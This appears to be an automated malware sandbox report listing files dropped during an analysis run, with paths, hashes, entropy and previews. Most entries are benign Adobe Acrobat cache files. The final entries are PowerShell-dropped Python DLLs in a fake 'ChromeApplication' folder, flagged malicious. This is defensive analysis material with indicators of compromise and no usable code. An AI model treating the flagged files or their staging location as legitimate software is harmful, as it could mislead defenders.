                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1164
                                                                                                                                                                                                  Entropy (8bit):5.701108445862805
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:Yv6X3iqKKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5Wn:Yvp5EgqprtrS5OZjSlwTmAfSKcn
                                                                                                                                                                                                  MD5:EF91D5309E5C7F847B8554206CC1DD8A
                                                                                                                                                                                                  SHA1:58097F095E824E26B03AAC75400A71FC63E8C05C
                                                                                                                                                                                                  SHA-256:0B8F8A9361C1FD9591B9844FE056561E41E8FEFC3E45934312BE1FC2B9FC3C64
                                                                                                                                                                                                  SHA-512:7913189B75E88FABD720C51AA62F3E102D635AB0420C12959E3063F89ACEE41E9C330FB70D3B1152BCE8FB28D3D045659552C11FDCD71AE2364EC7B7801BB206
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):289
                                                                                                                                                                                                  Entropy (8bit):5.281436685970978
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:YEQXJ2HXEgWY+FIbRI6XVW7+0Y5CJ2DoAvJfYdPeUkwRe9:YvXKX45YpW7qKZGg8Ukee9
                                                                                                                                                                                                  MD5:6A9E326E2FE470FFE93E20A65DA95B6E
                                                                                                                                                                                                  SHA1:F3BF68BAB606C5D3C0AF1599A1433E0A2B7F91CE
                                                                                                                                                                                                  SHA-256:085791805AFE90CAB946537E3D80F0CDC159D3E60EC7E79104C297AC188B1961
                                                                                                                                                                                                  SHA-512:E18ED99055B39F9A94F0C6DA968154FB0A676F77BD31FEF6D02AA9FD6F3A80AD387DF4C12C55006DF5EE54962B0CC1790A1BE1DFB6F2E24A3936500AD7A888A0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):284
                                                                                                                                                                                                  Entropy (8bit):5.267459230812531
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:YEQXJ2HXEgWY+FIbRI6XVW7+0Y5CJ2DoAvJf+dPeUkwRe9:YvXKX45YpW7qKZG28Ukee9
                                                                                                                                                                                                  MD5:473C8A0C9114258122C4B6A7FC673AF7
                                                                                                                                                                                                  SHA1:8D1AC3EEA1E5AC93D933979E20DE2EFD1AC17F44
                                                                                                                                                                                                  SHA-256:C6527E18DBF89B7A70C7C6DA216C870D15A9793DA17CD31AB2366071BCD1A241
                                                                                                                                                                                                  SHA-512:ACDBE3CA392E91CE7FE078DF3091418486D0760BF072131E8B5FAB7035C30020A95FB032BB1A985F67055571B6CA21B86E62FB418B9E0BC180AE98ED2FE03A66
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):5.265111366559131
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:YEQXJ2HXEgWY+FIbRI6XVW7+0Y5CJ2DoAvJfbPtdPeUkwRe9:YvXKX45YpW7qKZGDV8Ukee9
                                                                                                                                                                                                  MD5:11F646836EE497EF6CEDFB0D723F5636
                                                                                                                                                                                                  SHA1:E51AB861B32FE2EF4E1BA314A5B57CB093EE63CF
                                                                                                                                                                                                  SHA-256:A80B3A168468781979B6F9E2776D481B2E93B86A052596A530A1E5CA55C8BA9A
                                                                                                                                                                                                  SHA-512:929E107956D68BE6B7C389696371E4818E19AB55B14BBBF34D5F22C1CF1E6400B793C456BE602461E30980B720992C2B41725B3754258293C52114CBA168B890
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):287
                                                                                                                                                                                                  Entropy (8bit):5.265877891764462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:YEQXJ2HXEgWY+FIbRI6XVW7+0Y5CJ2DoAvJf21rPeUkwRe9:YvXKX45YpW7qKZG+16Ukee9
                                                                                                                                                                                                  MD5:B3DA4B3FF7494EFF88E41AE54A835412
                                                                                                                                                                                                  SHA1:ED78B4891FC1DB7181C7BF7078375089B59F1D45
                                                                                                                                                                                                  SHA-256:53796FC7B8B1FCE2EEAA938E077E03D9737A0945B34B44271FACFE250D5B9782
                                                                                                                                                                                                  SHA-512:70BDC9482C672E1E10589B455F63A27B8764868BA04A178CF7231C87D33FB4C8968DD55EA6F2CEB8324583991BFCE0175D20B40C748C80087AB4F454F6988FDE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1090
                                                                                                                                                                                                  Entropy (8bit):5.662443333028245
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:Yv6X3iq7amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSHn:YvpABgkDMUJUAh8cvMHn
                                                                                                                                                                                                  MD5:6A5C8121074683DED4DFF2DBF66FC01A
                                                                                                                                                                                                  SHA1:E3CF21F4116F20872201B6A4EB39E5BCA1A4671F
                                                                                                                                                                                                  SHA-256:3686306C122AA81AF7E7BC4C70B190C7BF9335FD1CF236B4B73D6143B784FDEA
                                                                                                                                                                                                  SHA-512:3DB3AEC29731F50AC0D6E45B5BE11AD43DB79BE52EE801A0554BB79BFB2AFD243932BAF3917E98F7C027B94CD3CA7EC4B23AA04899D17DC36C1F70F5F41A288E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):286
                                                                                                                                                                                                  Entropy (8bit):5.241077501947559
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:YEQXJ2HXEgWY+FIbRI6XVW7+0Y5CJ2DoAvJfshHHrPeUkwRe9:YvXKX45YpW7qKZGUUUkee9
                                                                                                                                                                                                  MD5:B2D608E8394EBFB8164A6CF24962D47E
                                                                                                                                                                                                  SHA1:23EF70E67ABD591966A6FCAD056C33410071EEEA
                                                                                                                                                                                                  SHA-256:BB3BE4D835E4C2B2EF5690DF5EC55D5DC8A68268904191485BB579EABD7A85D0
                                                                                                                                                                                                  SHA-512:FBF6C536D3DDD859E234B00BB445D6B9A6E1AF788FB6CF85CAB0E03E8A84203398D4AA6140D05BD8CC7E110B21122616FCEE2A5D1BFE761EF85A0551566F70A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):782
                                                                                                                                                                                                  Entropy (8bit):5.368825183278412
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:YvXKX45YpW7qKZGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWSn:Yv6X3iqY168CgEXX5kcIfANhHn
                                                                                                                                                                                                  MD5:D84331E7F0AD997BD02D748135B2047D
                                                                                                                                                                                                  SHA1:BD86BBFA23310C01417492ED2A11883B4C679B5D
                                                                                                                                                                                                  SHA-256:926DA6677D3259E5BB6757D395CADD2BBFFFEE596BE0E6DDF83FCF4DD06DE9AA
                                                                                                                                                                                                  SHA-512:7830C9483DC9764D2B303FB94AF013DC199AF959750E37113DA7CCE36C82625D4D6A2AA13EF04389F6275BDF78793B0DD637AE86213C73EA09452397757801DB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1731657642926}}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                  Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:e:e
                                                                                                                                                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2817
                                                                                                                                                                                                  Entropy (8bit):5.13809044268604
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Y+ryLg/tdtctN4JfPiX3Ua8qTDAhex9JP:tr/3KNkXiX3o4DJJP
                                                                                                                                                                                                  MD5:C8C56F91F11549976C169DEE14875906
                                                                                                                                                                                                  SHA1:444028D4756379625427274616EA0153D570E0B6
                                                                                                                                                                                                  SHA-256:560964219D28250516E8DBAA6A1CB640350944FDB67262B333381F68936B9EF7
                                                                                                                                                                                                  SHA-512:2238FB6781D0CFDE2A2AF918D1B229D5422F24B4529F45DBC117A6B275F21479C6CEFB9C5891B347B71F539760609DD01E5195306F08EB5800947235AD0CD677
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"c6d5fa303cc7bdd9abbe70c1ff4760cb","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1731657643000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"146f7683edc4484bd35c0d78b07c6ee0","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1731657642000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"840f8d5b1703fd0fc12c76b736ab99fa","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1731657642000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"067128bef5db7c1d3f155b70155ea6f4","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1731657642000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"d87be7088d73db9718a62d05faafacbf","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1731657642000},{"id":"Edit_InApp_Aug2020","info":{"dg":"a697dd592f101b524bd9e5d1c8c0032e","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                  Entropy (8bit):0.9850456336816371
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/Sp114zJwtNBwtNbRZ6bRZ4Q1F:TVl2GL7ms6ggOVpMzutYtp6PH
                                                                                                                                                                                                  MD5:744D7E9F498C8FE3D6B1F1CE7B9B12F0
                                                                                                                                                                                                  SHA1:C521DFD9ACD6433F5DE84762CCEB0F7FABFFA661
                                                                                                                                                                                                  SHA-256:6B588E605F38DC155E98A3BEC29E7410DC11CB7AD29E36D4D357A623AFF98035
                                                                                                                                                                                                  SHA-512:FEEC31D73E533225BA4BAB425E9EDCE251A2B4B3BFFE085C1306381FEF2AD2C630D8A951D03CF62C65247B5FD45B6695928077E6DA7D1A3D8623FE4DD83E6AA2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                                                  Entropy (8bit):1.3398426100948029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:7+toAD1RZKHs/Ds/Sp11PzJwtNBwtNbRZ6bRZWf1RZK8qLBx/XYKQvGJF7ursp:7MoGgOVpzzutYtp6PMlqll2GL7msp
                                                                                                                                                                                                  MD5:FBD86DD1C3C9F1B10BD4768E67D21838
                                                                                                                                                                                                  SHA1:910AD7CB6FCE580D1393A77856687A941C90C038
                                                                                                                                                                                                  SHA-256:3E83B8E10AD076EE42E6465CB62E8CEF68300316392BE67262C02A79BE4FF037
                                                                                                                                                                                                  SHA-512:92A0310771C8EA267C8E0DBC0788647757FDC3385E85D74E01FC837C181307FF3813DE4B4B5CB8EE4066034B8DA5258F865FCB92C3B488C301A543342B09DA9C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):66726
                                                                                                                                                                                                  Entropy (8bit):5.392739213842091
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgyqfaP8l1O46FyAWUq+QvPXLTmHEn5Yyu:6a6TZ44ADEyqfN1nPrUq+WXdK
                                                                                                                                                                                                  MD5:3B99E7CB9AABDC03300AF0288271BEAA
                                                                                                                                                                                                  SHA1:1E85728A26D93010BFC443B50090D661E3FC61A0
                                                                                                                                                                                                  SHA-256:7E75696CD05F815AC5710575759B9E9331CDA883D39FE755ED27AEFD217A486D
                                                                                                                                                                                                  SHA-512:9386FE1DCF2F2A97A711B1AA08B3856F59321B44CD2EABD96F732DDDF26EF2FE74B82E4D20F9126A648F68B2D0BEFECD03DE3BA10D189257354F2BDF564E674B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_asyncio.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):56600
                                                                                                                                                                                                  Entropy (8bit):6.701238830377098
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:FDUfUUn5KdYveu2H7sz9YHIRTRILOnY7SyOPx3A:FDgDn0KPz9YHIxRILOnYIx3A
                                                                                                                                                                                                  MD5:252C9B6FCC220FE16499ABF4A8E2A2E8
                                                                                                                                                                                                  SHA1:03327874A1153E9FE640E6F5E8D987CCC84034C4
                                                                                                                                                                                                  SHA-256:E01FDB89380EBF58700F40DCEBAFCB37F24970C8EA1F33063BDEA873B53E720D
                                                                                                                                                                                                  SHA-512:F68C9D043D5EF7A32098DDD9C1622F761F88DA31CA47450AB1D95E51AB8CD06E1658DC57DB150AAF51B682F7F285654E6BBD118B3CA8400BB5B2D461BDC78926
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                  • Filename: x.bat, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Patched.24562.10289.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Patched.24562.10289.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Patched.29806.7109.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: electrum-4.5.3-setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: electrum-4.5.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:...T..T..T....T...U..T...Q..T...P..T...W..T.m.U..T..U..T..U.+.T.m.\..T.m.T..T.m....T.m.V..T.Rich..T.........................PE..L...9.,d...........!.....R...\.......V.......p......................................B.....@.............................P......d......................../..........(...T...............................@............p...............................text...TP.......R.................. ..`.rdata...7...p...8...V..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_bz2.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):72472
                                                                                                                                                                                                  Entropy (8bit):6.8432832170573255
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:QxDhX4Vb2zMIsTRGxT+0q8i9qK5ILCVwQ7Sy8Pxer:mhi2zvsCK0ti9qK5ILCVwQ6xw
                                                                                                                                                                                                  MD5:5C952E57426E429F6F4CEC9FEB841815
                                                                                                                                                                                                  SHA1:83BFD2108E188909C7FF3B294AB9C99336D02D06
                                                                                                                                                                                                  SHA-256:B682E9E8152036BDEBF4CA5410D3C0F88FA3272A969830F63C7B61BB1F0DA89F
                                                                                                                                                                                                  SHA-512:2B6AB5F24E7E232C8906AC12C5A4994CFCF1B061FFC25407F278DE3D97664716C24E58237EE6EC48949AC6C1F4522AA1CA4C5238015D128E3A9BE602D2CE0ED2
                                                                                                                                                                                                  Malicious:true
